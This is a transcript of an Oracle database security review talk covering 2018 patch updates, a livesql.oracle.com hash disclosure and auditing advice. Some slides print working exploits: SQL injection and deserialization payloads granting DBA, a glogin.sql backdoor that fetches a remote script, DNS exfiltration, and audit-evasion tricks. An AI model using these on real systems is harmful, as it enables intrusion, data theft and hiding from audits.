best of oracle 2018 - red-database-security.com the cloud databases by hacking probability (e.g....
TRANSCRIPT
Best of Oracle Security 2018
What happened in 2018?
Agenda
! Intro ! livesql.oracle.com ! January 2018 - November 2018 ! DNS Exfiltration ! Bypass Oracle Auditing ! Outlook 2019 ! Q&A
OOW 2018 & Larry’s bot army for autonomous databases
„… modern cloud is constantly under attack by what are called botnets…“* „Because if they have robot attacks on our clouds, and robot attacks in our data centers and our government agencies, you better have robotic defenses…“ * Already discussed in 2012 by Red-Database-Security („Selfdefending databases“**)
* https://www.foxbusiness.com/technology/oracle-is-building-a-robot-army-to-protect-data** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf
OOW 2018 & Larry Ellison about Cloud Security
“We’ve seen headlines, you know, cyber break-ins at Google, at Facebook, at Amazon, big government agencies,” he said. “It’s happening because these architectures, these old cloud architectures really were never designed for security. Security was an afterthought.”
https://www.foxbusiness.com/technology/oracle-is-building-a-robot-army-to-protect-data
LiveSQL security
Oracle 18c testdrive Hardened Oracle 18c with free SQL interface
livesql.oracle.com. (requires OTN account)
livesql.oracle.com - Part I
Check which tables are accessible sys.user$ was accessible All password hashes included
livesql.oracle.com - Part I
Reported to [email protected] 2 weeks later the problem was fixed And I got a credit in the October 2018 CPU
livesql.oracle.com - Part II
Is the issue (revoke select on sys.user$) now solved? Yes, the user$ problem was fixed, but a real attacker would continue…
livesql.oracle.com - Attacker’s next steps
Analyze collected data from sys.user$ 786 Entries in SYS.USER$ A few (13) unsecure MD5-Passwords (H:) Old case insensitive Oracle 10g/DES Passwords (password column) Most accounts have 3 passwords DES, SHA1 and PBKDF2-Passwords User for 3rd-party security scanner QUALYS installed (QUALYS_SCAN).
Crack the password hashes (e.g. using hashcat).(BTW, using passwords with <word>123 is not a strong password) Identify shared (over multiple DBs) service accounts (here QUALYS_SCAN)
livesql.oracle.com - ASSUMPTION
Majority of customers are using the identical passwords for agent accounts for all systems Setting the password via „identified by values“ is an indicator for the usage of the same password My Assumption: Oracle was using the same password for ALL cloud instances. Having a has value of a highly privileged account on all Oracle (cloud?) systems is VERY interesting for attackers (if the hash can be cracked) After an information disclosure it is recommended to change ALL occurrences of the password (if the password is not strong, 16+ characters)
Post-Incident-Steps on Cloud-Systems
Try to analyze what happened on the system (using auditing) Analyze side effects to other cloud systems(e.g. shared accounts) Check, if the attacker could escape from the system Remove reports/dumps/… with suspicious information. …
Lessons Learned - Oracle in (hacked) Cloud Systems
Never use (agent) accounts with identical passwords (e.g. Nagios, Patrol, Scan-User, …) to avoid interference with other cloud systems Harden your cloud databases (dbsat, qualys, … alone is not sufficient) Classify the cloud databases by hacking probability (e.g. custom sql/reporting is highly dangerous) Always have a post-incident workflow in place (analyze what happened during the attack) Audit suspicious attacks (e.g. select * from sys.user$ is ALWAYS suspicious) Cleanup traces of the attacker (e.g. livesql reports with password hashes)
Database Vulnerabilities and CPU
Again the patch situation is better (down from 14 in 2017 to 12 in 2018)
Problem: At the moment only a few people are looking for security bugs in the database
Nowadays it’s rare that exploit code for databases is published Several unnamed security fixed affect the fully qualified references (e.g. SYS.DBMS_SCHEDULER instead of DBMS_SCHEDULER)
Database Vulnerabilities and CPU
Rodrigo Jorge is providing detailed analysis of the Oracle CPUs*
< DBMS_SCHEDULER.DISABLE(M_NEW_JOB_NAME);---> SYS.DBMS_SCHEDULER.DISABLE(M_NEW_JOB_NAME);
< DBMS_SCHEDULER.SET_ATTRIBUTE(M_NEW_JOB_NAME, 'REPEAT_INTERVAL',< M_INTERVAL);---> SYS.DBMS_SCHEDULER.SET_ATTRIBUTE(M_NEW_JOB_NAME, 'REPEAT_INTERVAL',> M_INTERVAL);
" https://www.dbarj.com.br/en/2018/08/dissecting-180717-bp-psu-ru-and-rur/ " https://www.dbarj.com.br/en/2018/05/dissecting-180417-bp-psu-ru-and-rur/" https://www.dbarj.com.br/en/2018/05/oracle-12-2-0-1-jan2018-rur-180417-or-180411/ " https://www.dbarj.com.br/en/2018/01/dissecting-180116-bp-psu-ru-rur/
Oracle Vulnerabilities 2018
Oracle Vulnerabilities 2018
Number of vulnerabilities in Oracle database reduced again
! 12 findings in 2018 (2017: 14, 2016:30 , 2015: 29, 2014: 43, 2013: 13 2012: 17)
! 6 remote exploitable bugs (2016: 8, 2015:3, 2014: 4, 2013: 7, 2012: 8 )
• January 2018 CPU (5 Vulnerabilities – 3 remote)
• April 2018 CPU (1 Vulnerabiliy – 0 remote)
• July 2018 CPU (3 Vulnerabilities – 1 remote)
• October 2018 CPU (3 Vulnerabilities – 2 remote)
Jan 2018 - Nov 2018
January 2018
Oracle CPU January 2018 *
* https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
January 2018 CPU*
5 security fixes (3 remote exploitable)
2 RDBMS (CVSS 9.1, 2.0)
1 Java VM (CVSS 8.3)
1 WLM (Apache Tomcat) (CVSS 8.1)
1 APEX (CVSS 6.1)
" http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
CVE-2017-10282 (CVSS 9.1)
CVE-2017-10282 SQL Injection in CDBView (12.1.0.2, 12.2.0.1) This SQL Injection affects 12.1.0.2 and 12.2.0.1 when the user has this privileges on CDB$ROOT or if it is a non-CDB. Exploit shown last year, fixed in 2018
* https://www.dbarj.com.br/en/2018/01/sql-injection-on-12c-cbview-package-finally-fixed-on-180116/
Oracle 12.x Exploit I
SQL> conn doag2017/doag2017 Connect durchgeführt.
SQL> select granted_role from user_role_privs;
CONNECT EXECUTE_CATALOG_ROLE
SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to doag2017''; RETURN ''1'';END; SELECT f as x FROM dual)-- ‚);
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat Affect systems with HTTP PUTs enabled (via setting the "read-only" initialization parameter of the Default servlet to "false") are affected.
https://www.exploit-db.com/exploits/42966/
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 (CVSS 8.1)
CVE-2017-12617 (CVSS 8.1)
February 2018
Project Rico2 (Oracle Block Based Editor, Open Source)*
* https://github.com/ora600pl/rico2 ** http://blog.ora-600.pl/2018/02/14/project-rico2-and-the-history-of-apex-upgrade-that-went-terribly-wrong/
Rico 2 - Open Source BBED
* https://github.com/ora600pl/rico2 ** http://blog.ora-600.pl/2018/02/14/project-rico2-and-the-history-of-apex-upgrade-that-went-terribly-wrong/
rico2 > set offset 338rico2 > d File: /u01/app/oracle/oradata/SKIPER/652E0234EC88260AE0530100007FFD8B/datafile/o1_mf_system_f88l7sop_.dbf(11) Block: 2809 Offsets: 338 to 850 Dba: 0x2c00af9---------------------------------------------------------------c1020180 07787602 0e102118 ff3b4f72 | .....xv...!..;Or61636c65 20417070 6c696361 74696f6e | acle Application20457870 72657373 2052656c 65617365 | Express Release20342e32 2e352e30 302e3038 202d2050 | 4.2.5.00.08 - P
Oracle Transparent Data Encryption (TDE) is blocking data access via data blocks.
March 2018
nothing special happened
April 2018
Oracle CPU April 2018* 18.1 Features: SQL Injection Detection in SQL Developer **
* https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html ** https://www.thatjeffsmith.com/archive/2018/04/18-1-features-sql-injection-detection/
April 2018 CPU*
1security fix (0 remote exploitable)
1 Java VM (CVSS 8.5)
* https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
SQL Injection Detection in SQL Developer
CREATE OR REPLACE PROCEDURE get_record ( user_name IN VARCHAR2, service_type IN VARCHAR2, rec OUT VARCHAR2)IS query VARCHAR2(4000);BEGIN -- Following SELECT statement is vulnerable to modification -- because it uses concatenation to build WHERE clause. query := 'SELECT value FROM secret_records WHERE user_name=''' || user_name || ''' AND service_type=''' || service_type || ''''; DBMS_OUTPUT.PUT_LINE('Query: ' || query); EXECUTE IMMEDIATE query INTO rec ; DBMS_OUTPUT.PUT_LINE('Rec: ' || rec );END;/
https://www.thatjeffsmith.com/archive/2018/04/18-1-features-sql-injection-detection/
SQL Injection Detection
May 2018
How to bypass requirement of WITH GRANT OPTION on views accessing third-party tables*
* https://www.dbarj.com.br/en/2018/05/how-to-bypass-requirement-of-with-grant-option-on-views-accessing-third-party-tables/
May 2018 - Bypass grant option
SQL> grant select on USER_B.v1 to USER_C;grant select on USER_B.v1 to USER_C *FEHLER in Zeile 1:ORA-01720: Berechtigungsoption f³r 'USER_A.T1' nicht vorhanden
SQL> conn USER_B/oracleConnected.SQL> CREATE OR REPLACE PACKAGE pkg_bypass_go AS 2 3 TYPE t_tab IS TABLE OF USER_A.T1%ROWTYPE; 4 5 FUNCTION run (p_sql IN CLOB) 6 RETURN t_tab PIPELINED; 7 8 END pkg_bypass_go; 9 / Package created. SQL> CREATE OR REPLACE PACKAGE BODY pkg_bypass_go AS 2 3 FUNCTION run (p_sql IN CLOB) 4 RETURN t_tab PIPELINED 5 IS 6 l_cursor SYS_REFCURSOR; 7 l_row USER_A.T1%ROWTYPE; 8 BEGIN 9 OPEN l_cursor FOR p_sql; 10 LOOP 11 FETCH l_cursor 12 INTO l_row; 13 EXIT WHEN l_cursor%NOTFOUND; 14 PIPE ROW (l_row); 15 END LOOP; 16 CLOSE l_cursor; 17 RETURN; 18 END run; 19 20 END pkg_bypass_go; 21 /
Use a Pipeline Function to bypass the limitation
May 2018 - Bypass grant optionIf the USER_B account, who owns the view, also had the CREATE PROCEDURE privilege, he could bypass the ORA-01720 error by encapsulating the table T1 results on a pipelined function, and use this function inside his view.
SQL> create view USER_B.v1 as select * from USER_A.t1;SQL> grant select on USER_B.v1 to USER_C;grant select on USER_B.v1 to USER_C *FEHLER in Zeile 1:ORA-01720: Berechtigungsoption f³r 'USER_A.T1' nicht vorhanden
SQL> create .. pipeline function….
SQL> create or replace view USER_B.v1 as select * from table(pkg_bypass_go.run('select * from USER_A.t1’));
SQL> grant select on USER_B.v1 to USER_C; Grant succeeded.
June 2018
Protecting Oracle Database Binaries against malicious changes * Implement a hidden trojan in an oracle database**
* https://mahmoudhatem.wordpress.com/2018/06/13/using-ld_preload-to-implement-a-hidden-trojan-in-an-oracle-database/ ** https://www.dbarj.com.br/en/2018/06/protecting-oracle-database-binaries-against-malicious-changes/
June 2018 - Protecting Oracle Database Binaries against malicious changes
New Oracle 18c feature: Read-Only Oracle Home Ensure that no Oracle process is creating or changing files in the $ORACLE_HOME 1. Save current permissions and owners 2. Remove privileges from OS user Oracle 3. Rollback before applying patches
June 2018 - Trojan in TNS Listener
Using LD_PRELOAD to implement a hidden trojan in an oracle database Works in Read-Only-Oracle Home (ROOH) too Put a backdoor in /tmp/livclntsh.so.12.1 and use LD_PRELOAD to replace the Oracle library Start the TNS listener and connect directly (e.g. via netcat)
* https://mahmoudhatem.wordpress.com/2018/06/13/using-ld_preload-to-implement-a-hidden-trojan-in-an-oracle-database/
July 2018
Oracle CPU July 2018 *
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
July 2018 CPU*
3 security fixes (1 remote exploitable)
1 Oracle Spatial (CVSS 9.8, remote)
1 Core RDBMS (CVSS 8.4)
1 Java VM (CVSS 5.3)
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
CVE-2018-3004 (CVSS 5.4)
Privilege escalation via a java deserialization vector that bypasses built in Oracle JVM security. Proper exploitation can allow an attacker to gain shell level access on the server and SYS level access to the database.
read/write files without.using Oracle directory objects Exploits:
Insert SSH keys Modify login.sql Escape from CDB …
* https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
Oracle 12.x Exploit I
SQL> conn doag2018/doag2018 Connect durchgeführt.
SQL> create or replace and compile java source named DecodeMe as import java.io.*; import java.beans.*; public class DecodeMe{ public static void input(String xml) throws InterruptedException, IOException { XMLDecoder decoder = new XMLDecoder ( new ByteArrayInputStream(xml.getBytes())); Object object = decoder.readObject(); System.out.println(object.toString()); decoder.close();
Oracle 12.x Exploit I
SQL> CREATE OR REPLACE PROCEDURE decodeme (p_xml IN VARCHAR2) IS language java name 'DecodeMe.input(java.lang.String)'; /
Oracle 12.x Exploit ISQL> BEGIN decodeme(' <java class="java.beans.XMLDecoder" version="1.4.0"> <object class="java.io.FileWriter"> <string>C:\doag2018\doag2018.txt</string> <boolean>True</boolean> <void method="write"> <string>content of file doag2018.txt</string> </void> <void method="close" /> </object> </java> '); END; /
August 2018
Nothing special happened
September 2018
! Nothing special happened
October 2018
Oracle CPU October 2018 *
* https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
October 2018 CPU*
3 security fixes (2 remote exploitable)
1 Java VM (CVSS 9.8, remote)
1 ORACLE Text (CVSS 8.2 remote)
1 Rapid Home Provisioning (CVSS 2.3)
* https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
CVE-2018-7489 (Rapid Home Provisioning)
FasterXML jackson-databind before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.
" https://access.redhat.com/security/cve/cve-2018-7489 " https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891614 "
November 2018
DOAG 2018 Privilege Capturing Feature free in Oracle Enterprise Edition*,**
* http://www.petefinnigan.com/weblog/archives/00001448.htm ** https://docs.oracle.com/en/database/oracle/oracle-database/18/dblic/Licensing-Information.html#GUID-0F9EB85D-4610-4EDF-89C2-4916A0E7AC87
End of the annual review
DNS Exfiltration
DNS exfiltration is an old technique to exchange data between 2 computers without a direct connection.*
https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822
DNS Exfiltration
https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822
DNS Exfiltration
Several networks are vulnerable against DNS exfiltration This vulnerability can also be abused from an Oracle database This technique allows data transfer from (network) protected databases the outside Used during SQL Injection attacks Website http://requestbin.net/dns helps to identify the problem (!!! Created DNS link is only valid for 24 h)
DNS Exfiltration
SQL> select utl_http.request('Live_from_DOAG2018.eeebce28d20630e3b826.d.requestbin.net') from dual;
FEHLER in Zeile 1: ORA-29273: HTTP-Anforderung nicht erfolgreich ORA-12541: TNS: Kein Listener ORA-06512: in "SYS.UTL_HTTP", Zeile 1491 ORA-06512: in Zeile 1
SQL>
SQL> select utl_http.request('Live_from_DOAG2018.eeebce28d20630e3b826.d.requestbin.net') from dual;
FEHLER in Zeile 1: ORA-29273: HTTP-Anforderung nicht erfolgreich ORA-12541: TNS: Kein Listener ORA-06512: in "SYS.UTL_HTTP", Zeile 1491 ORA-06512: in Zeile 1
DNS Exfiltration
Several Oracle databases are vulnerable against DNS exfiltration
dbms_scheduler & SQL Scripts
Oracle 12.2 comes with a powerful feature to run SQL scripts It’s a feature, not a bug… All SQL*Plus commands (host, …) are allowed Requires CREATE EXTERNAL JOB privilege The following sample shows how to modify the glogin.sql on a database server
Sample SQL*Plus Script
host icacls "glogin.sql" /grant Users:F Host echo set term on >> glogin.sql host echo @http://www.orasploit.com/test.sql >> glogin.sql host echo grant dba to wuser identified by wuser; >> glogin.sql Host echo set term on >> glogin.sql
* Absolute path entries removed to make the sample more readable
Oracle 12.x Exploit ISET SERVEROUTPUT ON DECLARE l_job_name VARCHAR2(30); l_script VARCHAR2(32767); BEGIN l_job_name := DBMS_SCHEDULER.generate_job_name; DBMS_OUTPUT.put_line('JOB_NAME=' || l_job_name);
l_script := ' host icacls "C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql" /grant Users:F host echo @http://www.red-database-security.com/beta/test.sql >> C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql host echo grant dba to webuser identified by webuser; >>C:\app\orawin\product\12.1.0\dbhome_1\sqlplus\admin\glogin.sql
';
Oracle 12.x Exploit I DBMS_SCHEDULER.create_job( job_name => l_job_name, job_type => 'SQL_SCRIPT', job_action => l_script, credential_name => 'oracle_ol6_121', enabled => FALSE);
-- Set the credential used for SQL*Plus to -- connect to the database; DBMS_SCHEDULER.set_attribute( name => l_job_name, attribute => 'connect_credential_name', value => ‚test_pdb1_ol6_121');
-- Enable the job. DBMS_SCHEDULER.enable(l_job_name); END; /
Changes in 12.2/18c
A lot of useful security issues were changed in Oracle 12.2 / 18c All reference/index privileges from Oracle vendor accounts were removed Default ACL for XMLDB user and DBA role were removed on new databases. Only SYS can now bypass ACLs VPD can now be audited
New SQL Injection pattern
SQL> select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1';select * from dual where 1=1 and dbms_xdb_version.checkin((select user from dual))='1' *FEHLER in Zeile 1:ORA-31001: Ressourcen-Handle oder Pfadname ung³ltig: SYSORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 30ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 45
SQL> select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1';select * from dual where 1=1 and dbms_xdb_version.makeversioned((select user from dual))='1' *FEHLER in Zeile 1:ORA-31001: Ressourcen-Handle oder Pfadname ung³ltig: SYSORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 3ORA-06512: in "XDB.DBMS_XDB_VERSION", Zeile 18
* https://notwhy.github.io/2018/06/hacking-oracle/
Findings from Security Audits in 2018
Weak passwords (slowly getting better) Cleartext passwords in audit logs (if username/password was switched) Privilege Escalation via CREATE INDEX privilege (already shown 2016) Too many privileges (e.g. grant ALL, ANY privileges, …) …
Auditing SYS with loginuser
Many DBAs are using SSH to connect to the database server using their personal UNIX account After the logon they use the su command to change to the Oracle user Now they connect to the database using sqlplus / as SYSDBA
Auditing SYS (with login user)
ssh dbserver1 (as weber) su - oracle sqlplus / as sysdbaSQL> create user hacker identified as hacker;
ssh dbserver1 (as schmidt)
su - oracle
sqlplus / as sysdba
SQL> create user cracker identified as cracker;
SQL> select sessionid, os_username, dbusername, sql_text, UNIFIED_AUDIT_POLICIES from unified_audit_trail;
2056298984 oracle SYS create user cracker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS
2602877895 oracle SYS create user hacker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS
Who am I vs. whoamiMajority of DBAs are not aware that there is a difference between who and who am I
who am i: Login user whoami: Effective user
Sample:
ssh dbserver1 (as weber) su - oracle
Who am I weberWho oracle
Auditing SYS (with login user)
——- glogin.sql ———
set term offhost echo define login_user=`who | cut -d" " -f1` > [email protected] dbms_session.set_identifier('&login_user‘);set term on
——- glogin.sql ———
Alternative: Logon-Trigger can read the (original) login user id from /proc/<processid>/loginuid via an external table and join this uid with the real name from /etc/passwd (via external table or inline external SQL)
Auditing SYS (with login user)
ssh dbserver1 (as weber)
su - oracle
sqlplus / as sysdba
SQL> create user hacker identified as hacker;
ssh dbserver1 (as schmidt)
su - oracle
sqlplus / as sysdba
SQL> create user crackeridentified as cracker;
SQL> select sessionid, client_identifier, os_username, dbusername, sql_text, UNIFIED_AUDIT_POLICIES from unified_audit_trail;
2056298984 oracle schmidt SYS create user cracker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS
2602877895 oracle weber SYS create user hacker identified by * ORA_ACCOUNT_MGMT, ORA_CIS_RECOMMENDATIONS
Auditing SYS (with login user)
It is now possible to distinguish between different SYSDBA/SYSOPER connections at session level (v$session and audit trail). Try to use the new users SYSBACKUP, SYSDG, SYSKM instead of SYS Another advantage of using SYSBACKUP, SYSDG and SYSKM are limited privileges
Outlook 2019
Started with a new investigation „How to bypass database auditing solutions“
Found multiple security bugs and issues in auditing components of databases (Oracle, Hana), 3rd-party Audit Solutions and SIEM solutions
Bugs are still unfixed and to protect the innocent I will wait until 2019 to release the presentation
Found more than 40 different ways to bypass Auditing
Sneak Preview Audit Issues
How to detect if a table is monitored using Oracle unified Auditing Simple ways to bypass Oracle Auditing
Detect protected tables
To find out if a table is protected by unified auditing you can use the „set transaction read only“ command If the session is set to readonly, Oracle Unified Auditing is not able to write the audit entry ;-) No Audit entry was created (but no data retrieved as well)
Fixed in Oracle 18c
Access protected tableswithout creating audit entries
There are various ways to avoid audit entries when accessing audited tables. Sample:
create audit policy sel_emp actions select on scott.emp;audit policy sel_emp; SQL> set transaction read only;
SQL> select * from sel.emp where rownum=1 /*xx*/ ; *
FEHLER in Zeile 1:
ORA-02002: Fehler beim Schreiben von Audittrail
ORA-55917: Tabellen-Flush-I/O nicht erfolgreich für Log-ID: 1 Bucket-ID: 0
ORA-55917: Tabellen-Flush-I/O nicht erfolgreich für Log-ID: 1
Bucket-ID: 0
ORA-01456: INSERT/DELETE/UPDATE bei einer READ ONLY Transaktion nicht zulässig
https://blogs.oracle.com/oraclemagazine/unify-auditing
How can we get the table data without triggering auditing?
Alter table rename scott.emp to scott.noemp; select * from scott.noemp; Alter table rename scott.noemp to scott.emp;
+ a few more (noaudit, alter user, dbms_sys_sql, ….)
rename scott.emp to scott.noemp; select * from scott.noemp; rename scott.noemp to scott.emp;
drop table scott.emp; select * from "BIN$HGnc55/7rRPgQPeM/qQoRw==$0";flashback table scott.emp to before drop; Create table scott.noemp as select * from scott.emp; select * from scott.noemp; [Fixed in July 2017 CPU, src: Oracle secalert]
Trends 2019
Much more Oracle 18c vulnerabilities
Migration to 18c/19c
Oracle & Cloud Systems
Oracle Multi-Tenant
More auditing projects
Integration Auditing with SIEM solutions
Q & A
Thank you Contact:
Red-Database-Security GmbH Eibenweg 42 D-63150 Heusenstamm Germany